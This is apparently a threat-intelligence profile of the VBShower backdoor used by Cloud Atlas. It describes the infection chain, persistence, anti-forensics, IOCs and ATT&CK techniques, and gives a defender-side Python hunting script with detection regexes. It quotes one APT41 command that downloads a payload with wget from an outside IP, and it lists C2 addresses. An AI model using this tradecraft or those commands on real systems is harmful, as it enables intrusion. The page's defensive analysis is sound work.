VBShower
VBShower is a polymorphic VBS-based backdoor/launcher used by the Cloud Atlas (also known as Inception) espionage group. It has been observed in multi-stage phishing campaigns targeting organizations primarily in Eastern Europe and Central Asia, with reporting specifically noting heavy targeting of Russian organizations and additional victims in Belarus, Canada, Moldova, Israel, Kyrgyzstan, Vietnam, and Turkey. Initial access is delivered through phishing emails carrying malicious Microsoft Word documents that load remote templates and exploit Microsoft Equation Editor vulnerability CVE-2018-0802, ultimately downloading and executing an HTA file. That HTA extracts and creates several VBS files on disk that form the VBShower backdoor, including launcher/cleaner components and an encrypted payload, with some reporting noting storage under %APPDATA%\Roaming\Microsoft\Windows\ using NTFS alternate data streams.
VBShower serves as the primary launcher component and replaced PowerShower as a validator in newer Cloud Atlas chains. It establishes persistence via a Run registry key that launches a VBS script with wscript, and it has been reported to repeatedly check and restore its autorun key if removed. It decrypts its backdoor in multiple stages and executes it in memory. VBShower can execute downloaded VBScript files regardless of file size, and has attempted to retrieve VBS tasking from command-and-control servers over HTTP. Reporting states it can execute downloaded scripts either in memory or from NTFS alternate data streams depending on size, and send TMP files containing payload output back to C2 via HTTP POST.
VBShower has anti-forensic behavior: it attempts to delete files or erase contents in Temporary Internet Files\Content.Word paths associated with malicious documents and templates to hinder forensic analysis. Observed payloads and follow-on activity include installation of other Cloud Atlas malware families, notably PowerShower, VBCloud, and the CloudAtlas backdoor. Reported VBShower-delivered tasks include host, user, registry Run key, file inventory, process, and scheduled task collection. Public reporting also lists VBShower-related file paths such as %APPDATA%\[A-Za-z]{5}.vbs.dat, %APPDATA%\[A-Za-z]{5}.vbs, and %APPDATA%\[A-Za-z]{5}.mds (the bracketed expressions are regular-expression patterns matching the variable file and value names), persistence under HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[a-f0-9A-F]{8}, and C2 IPs 176.31.59.232 and 144.217.174.57.
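A defender-side hunting routine over constructed telemetry, written for this page as an added example (not code from the public reporting or from Mallory): it flags the hex-named Run value and five-letter %APPDATA% script-name patterns listed above, wscript launching a script from an NTFS alternate data stream under the reported drop directory, and repeated re-creation of the same Run value, which is how the reported autorun-restore behaviour would show up in registry events. The event shape (kind/ts/target/data/image/cmdline), the user name "u" and every sample value are constructed assumptions, not values from a real incident.

```python
import re
from collections import Counter
# Patterns from the public reporting summarized above: an 8-hex-char Run value name,
# a five-letter .vbs(.dat) under %APPDATA%, and file:stream (NTFS ADS) paths under the drop directory.
RUN_VALUE = re.compile(r"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\([0-9a-fA-F]{8})$")
APPDATA_VBS = re.compile(r"(?:%APPDATA%|\\AppData\\Roaming)\\[A-Za-z]{5}\.vbs(?:\.dat)?\b")
ADS_SCRIPT = re.compile(r"\\Microsoft\\Windows\\[^\\:\"\s]+:[^\\:\"\s]+")

def hunt(events):
    """Return (timestamp, finding) tuples for a list of registry_set / process_create events."""
    findings, run_writes = [], Counter()
    for ev in events:
        if ev["kind"] == "registry_set":
            m = RUN_VALUE.search(ev["target"])
            if not m:
                continue  # only hex-named Run values are of interest here
            run_writes[m.group(1)] += 1
            if "wscript" in ev["data"].lower() and APPDATA_VBS.search(ev["data"]):
                findings.append((ev["ts"], f"Run value {m.group(1)} launches a 5-letter .vbs via wscript"))
        elif ev["kind"] == "process_create":
            if ev["image"].lower().endswith("wscript.exe") and ADS_SCRIPT.search(ev["cmdline"]):
                findings.append((ev["ts"], "wscript executing a script from an NTFS alternate data stream"))
    # The same Run value being written more than once matches the reported
    # behaviour of checking and restoring the autorun key after it is removed.
    for name, n in run_writes.items():
        if n > 1:
            findings.append((None, f"Run value {name} written {n} times"))
    return findings

# Constructed sample telemetry (not from a real incident); "u" is a placeholder user name.
SAMPLE_EVENTS = [
    {"kind": "registry_set", "ts": "10:01:02",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\3fA91c0e",
     "data": r'wscript.exe "%APPDATA%\Qwert.vbs"'},
    {"kind": "registry_set", "ts": "10:02:15",  # benign: non-hex name, not a script
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "data": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"kind": "registry_set", "ts": "10:06:40",  # same value re-created after deletion
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\3fA91c0e",
     "data": r'wscript.exe "%APPDATA%\Qwert.vbs"'},
    {"kind": "process_create", "ts": "10:06:41", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe //B C:\Users\u\AppData\Roaming\Microsoft\Windows\Themes:ta.vbs'},
    {"kind": "process_create", "ts": "10:07:00", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Scripts\logon.vbs"'},  # benign logon script
]

if __name__ == "__main__":
    for ts, finding in hunt(SAMPLE_EVENTS):
        print(ts or "summary", finding)
```

The same regexes can be dropped into a SIEM query over registry set-value and process-creation events; the repeat-write check needs a count over a time window rather than a single event.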
Vulnerabilities exploited
One CVE has been correlated with this family across public research and vendor advisories: CVE-2018-0802 (Microsoft Equation Editor). Supporting evidence from public reporting:
Victims get infected via phishing emails containing a malicious document that exploits a vulnerability in the formula editor (CVE-2018-0802) to download and execute malware code.
The malicious HTA file extracts and writes several files to disk that are parts of the VBShower backdoor. VBShower then downloads and installs another backdoor: PowerShower.
Groups observed using it
One distinct threat actor is attributed by public researchers: Cloud Atlas (also known as Inception), on the strength of the HTA-to-VBShower-to-PowerShower delivery chain quoted in the previous section.
Techniques & procedures
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (2 techniques)
Execution (2 techniques)
VBShower::Launcher ... using the Execute() function to pass control to that file.
When opened, the document downloads a malicious template formatted as an RTF file from a remote server controlled by the attackers. It contains a formula editor exploit that downloads and runs an HTML Application (HTA) file hosted on the same C2 server.
Persistence (1 technique)
Privilege Escalation (1 technique)
Stealth (5 techniques)
Documented examples of these techniques describe post-intrusion cleanup, anti-forensics, and removal of artifacts such as logs, scripts, malware components, scheduled tasks, registry keys, and temporary files.
VBShower::Cleaner ... removing malicious documents and templates it downloaded from the web during the attack.
Discovery (4 techniques)
Command and Control (2 techniques)
Public reporting repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
Examples include: "APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits," "During C0017, APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads," and multiple malware families "use HTTP GET requests" or similar to download files/payloads.
IOCs tracked for this family
38 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, in two groups:
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
12 sources tracked across advisories, community write-ups, and news.
Custom malware delivered after a malicious Word document loads a remote template from C2 and exploits CVE-2018-0802; VBShower is downloaded using alternate data streams.
VBShower is a backdoor used by the Cloud Atlas threat actor, delivered via phishing documents. It downloads and installs other backdoors and can be used to exfiltrate files and gather information.
Primary launcher backdoor used by Cloud Atlas APT to execute downloaded VB scripts and deploy additional payloads. It communicates with command servers to retrieve and execute scripts for file exfiltration, system enumeration, and credential harvesting.
VBShower is a VBS-based backdoor used as an initial stage in the Cloud Atlas infection chain. It is responsible for downloading and installing additional backdoors (PowerShower, VBCloud, CloudAtlas), collecting system information, and facilitating persistence and further payload delivery.